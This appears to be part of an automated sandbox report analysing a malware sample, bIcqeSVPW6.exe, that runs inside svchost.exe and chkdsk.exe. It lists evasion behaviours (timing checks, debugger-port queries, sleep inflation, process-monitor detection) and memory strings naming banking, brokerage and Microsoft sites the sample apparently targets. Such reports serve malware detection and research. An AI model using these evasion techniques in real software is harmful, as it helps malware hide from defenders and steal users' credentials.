Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	API/Special instruction interceptor: Address: C77014
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\chkdsk.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: bIcqeSVPW6.exe, 00000000.00000003.1470169520.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, bIcqeSVPW6.exe, 00000000.00000003.1470038762.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp, bIcqeSVPW6.exe, 00000000.00000002.1482146327.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCMON.EXETH

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Evaded block: after key decision

graph_0-94830

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-95379

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	API coverage: 4.2 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\chkdsk.exe	API coverage: 2.6 %

Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe TID: 5200	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe TID: 5200	Thread sleep time: -37500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 2044	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 2044	Thread sleep time: -86000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A56CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A56CA9
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A560DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00A560DD
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A563F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00A563F9
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A5EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A5EB60
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A5F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00A5F5FA
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A5F56F FindFirstFileW,FindClose,	0_2_00A5F56F
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A61B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A61B2F
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A61C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A61C8A
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A61F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A61F94
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0509C540 FindFirstFileW,FindNextFileW,FindClose,	5_2_0509C540

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A2DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A2DDC0

Source: 84--3745Q.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 84--3745Q.5.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: 84--3745Q.5.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 84--3745Q.5.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 84--3745Q.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 84--3745Q.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 84--3745Q.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 84--3745Q.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 84--3745Q.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 84--3745Q.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 84--3745Q.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 84--3745Q.5.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 84--3745Q.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 84--3745Q.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 84--3745Q.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 84--3745Q.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: chkdsk.exe, 00000005.00000002.3318382305.00000000053F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: 84--3745Q.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: firefox.exe, 00000009.00000002.2004133537.0000012DF9FEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 84--3745Q.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 84--3745Q.5.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 84--3745Q.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 84--3745Q.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 84--3745Q.5.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 84--3745Q.5.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: 84--3745Q.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: qcjVHvcmgHQ.exe, 00000004.00000002.3318469161.000000000074E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 84--3745Q.5.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 84--3745Q.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 84--3745Q.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 84--3745Q.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 84--3745Q.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 84--3745Q.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 84--3745Q.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	API call chain: ExitProcess graph end node			graph_0-94082
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	API call chain: ExitProcess graph end node			graph_0-95123

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004E77F3 LdrLoadDll,

2_2_004E77F3

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A66AAF BlockInput,

0_2_00A66AAF

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A13D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00A13D19

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A43920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00A43920

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A2E01E LoadLibraryA,GetProcAddress,

0_2_00A2E01E

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00C772E0 mov eax, dword ptr fs:[00000030h]	0_2_00C772E0
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00C77280 mov eax, dword ptr fs:[00000030h]	0_2_00C77280
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00C75C70 mov eax, dword ptr fs:[00000030h]	0_2_00C75C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]	2_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]	2_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]	2_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]	2_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]	2_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]	2_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]	2_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]	2_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]	2_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]	2_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]	2_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]	2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]	2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]	2_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]	2_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]	2_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]	2_2_03104164
